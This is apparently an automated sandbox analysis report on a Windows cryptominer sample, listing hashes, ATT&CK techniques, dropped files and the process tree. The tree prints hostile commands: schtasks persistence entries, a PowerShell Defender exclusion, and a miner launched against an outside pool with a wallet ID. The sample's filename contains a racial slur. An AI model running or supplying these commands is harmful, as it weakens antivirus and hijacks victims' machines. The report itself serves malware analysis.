5536d8e31ee96b4cdfbd1a1b485cb13960f01ddf218ee8d17f42f5f02b41d68e

Resubmissions

07-07-2022 07:45

220707-jlmt7afdal 10

07-04-2022 05:16

220407-fx5btsbhf2 8

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
07-07-2022 07:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BstNiggaStub.exe
Size

1017KB
MD5

6a63a4741f5d8561a08069dab3c9afbc
SHA1

4cceb4ccf7a1d488bc7a4b67ced920c7fcbec8a2
SHA256

5536d8e31ee96b4cdfbd1a1b485cb13960f01ddf218ee8d17f42f5f02b41d68e
SHA512

1afc1ec86a900827257b7fff7f2a598a0b35ef3f489a7ea11fe0d6a130335550ac6032a18e2c425429e06aae52ed89c84697ac9d12b3080cc2ee9b95b9ca9dab

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3248	WindowsFinder.exe
3168	WindowsFinder.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	BstNiggaStub.exe

Loads dropped DLL 6 IoCs

pid	Process
3168	WindowsFinder.exe
3168	WindowsFinder.exe
3168	WindowsFinder.exe
3248	WindowsFinder.exe
3248	WindowsFinder.exe
3248	WindowsFinder.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4036	1572	WerFault.exe	80

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4132	schtasks.exe
4808	schtasks.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1772	powershell.exe
1772	powershell.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe
1572	BstNiggaStub.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1572	BstNiggaStub.exe
Token: SeDebugPrivilege	1772	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1572 wrote to memory of 1276	1572	BstNiggaStub.exe	81
PID 1572 wrote to memory of 1276	1572	BstNiggaStub.exe	81
PID 1572 wrote to memory of 1276	1572	BstNiggaStub.exe	81
PID 1572 wrote to memory of 3588	1572	BstNiggaStub.exe	82
PID 1572 wrote to memory of 3588	1572	BstNiggaStub.exe	82
PID 1572 wrote to memory of 4132	1572	BstNiggaStub.exe	84
PID 1572 wrote to memory of 4132	1572	BstNiggaStub.exe	84
PID 1572 wrote to memory of 4808	1572	BstNiggaStub.exe	86
PID 1572 wrote to memory of 4808	1572	BstNiggaStub.exe	86
PID 1572 wrote to memory of 1772	1572	BstNiggaStub.exe	88
PID 1572 wrote to memory of 1772	1572	BstNiggaStub.exe	88
PID 1572 wrote to memory of 3248	1572	BstNiggaStub.exe	90
PID 1572 wrote to memory of 3168	1572	BstNiggaStub.exe	91
PID 1572 wrote to memory of 3248	1572	BstNiggaStub.exe	90
PID 1572 wrote to memory of 3168	1572	BstNiggaStub.exe	91

C:\Users\Admin\AppData\Local\Temp\BstNiggaStub.exe
"C:\Users\Admin\AppData\Local\Temp\BstNiggaStub.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:1276
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /tn WindowsService /f
  2⤵
  PID:3588
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn WindowsService /tr "C:\Users\Admin\AppData\Roaming\Windows Folder\Windows Service.exe" /sc onlogon /rl highest
  2⤵
  - Creates scheduled task(s)
  PID:4132
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn WindowsServiceUpload /tr "C:\Users\Admin\AppData\Roaming\Windows Folder\Windows Service.exe" /f /rl highest
  2⤵
  - Creates scheduled task(s)
  PID:4808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Folder'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1772
- C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe
  "C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3248
- C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe
  "C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3168
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1572 -s 2420
  2⤵
  - Program crash
  PID:4036

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 1572 -ip 1572
1⤵
PID:4612

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\OpenCL.dll

Filesize
28KB

MD5
75c82cc70a4a8f9878959edc4e40e067

SHA1
b3858343b9e2befcc28fd465fd377da451186033

SHA256
534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc

SHA512
68e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\OpenCL.dll

Filesize
28KB

MD5
75c82cc70a4a8f9878959edc4e40e067

SHA1
b3858343b9e2befcc28fd465fd377da451186033

SHA256
534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc

SHA512
68e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\OpenCL.dll

Filesize
28KB

MD5
75c82cc70a4a8f9878959edc4e40e067

SHA1
b3858343b9e2befcc28fd465fd377da451186033

SHA256
534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc

SHA512
68e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe

Filesize
6.2MB

MD5
5b69b37c6acf7203fcef43fb3f1b794d

SHA1
538caf62f25dea9d174f02aead4dc846ebadc345

SHA256
6fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5

SHA512
ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe

Filesize
6.2MB

MD5
5b69b37c6acf7203fcef43fb3f1b794d

SHA1
538caf62f25dea9d174f02aead4dc846ebadc345

SHA256
6fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5

SHA512
ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\libcrypto-1_1-x64.dll

Filesize
3.3MB

MD5
32d7e884189e301c3cd4b6993abb283f

SHA1
793fa8e8e51c591c520e906061313e8f97287440

SHA256
5862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519

SHA512
b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\libcrypto-1_1-x64.dll

Filesize
3.3MB

MD5
32d7e884189e301c3cd4b6993abb283f

SHA1
793fa8e8e51c591c520e906061313e8f97287440

SHA256
5862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519

SHA512
b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\libcrypto-1_1-x64.dll

Filesize
3.3MB

MD5
32d7e884189e301c3cd4b6993abb283f

SHA1
793fa8e8e51c591c520e906061313e8f97287440

SHA256
5862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519

SHA512
b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\toncrypto.dll

Filesize
3.6MB

MD5
703f25116760b08f24401832edb0014f

SHA1
631bdb041296c58849648a447afd7046246747a1

SHA256
c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558

SHA512
566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\toncrypto.dll

Filesize
3.6MB

MD5
703f25116760b08f24401832edb0014f

SHA1
631bdb041296c58849648a447afd7046246747a1

SHA256
c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558

SHA512
566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\toncrypto.dll

Filesize
3.6MB

MD5
703f25116760b08f24401832edb0014f

SHA1
631bdb041296c58849648a447afd7046246747a1

SHA256
c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558

SHA512
566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b

Download Submit
memory/1572-143-0x0000022135140000-0x0000022135152000-memory.dmp

Filesize
72KB

Download
memory/1572-141-0x0000022134E24000-0x0000022134E27000-memory.dmp

Filesize
12KB

Download
memory/1572-137-0x0000022133FB9000-0x0000022133FBF000-memory.dmp

Filesize
24KB

Download
memory/1572-159-0x0000022134E24000-0x0000022134E27000-memory.dmp

Filesize
12KB

Download
memory/1572-161-0x0000022134E27000-0x0000022134E2C000-memory.dmp

Filesize
20KB

Download
memory/1572-136-0x0000022133F90000-0x0000022133F9A000-memory.dmp

Filesize
40KB

Download
memory/1572-142-0x0000022134E27000-0x0000022134E2C000-memory.dmp

Filesize
20KB

Download
memory/1572-160-0x0000022134E20000-0x0000022134E24000-memory.dmp

Filesize
16KB

Download
memory/1572-158-0x00007FFDDBEA0000-0x00007FFDDC961000-memory.dmp

Filesize
10.8MB

Download
memory/1572-131-0x00007FFDDBEA0000-0x00007FFDDC961000-memory.dmp

Filesize
10.8MB

Download
memory/1572-140-0x0000022134E20000-0x0000022134E24000-memory.dmp

Filesize
16KB

Download
memory/1572-130-0x00000221197A0000-0x00000221197CA000-memory.dmp

Filesize
168KB

Download
memory/1772-139-0x00007FFDDBEA0000-0x00007FFDDC961000-memory.dmp

Filesize
10.8MB

Download
memory/1772-138-0x0000023F5CC30000-0x0000023F5CC52000-memory.dmp

Filesize
136KB

Download
memory/1772-144-0x00007FFDDBEA0000-0x00007FFDDC961000-memory.dmp

Filesize
10.8MB

Download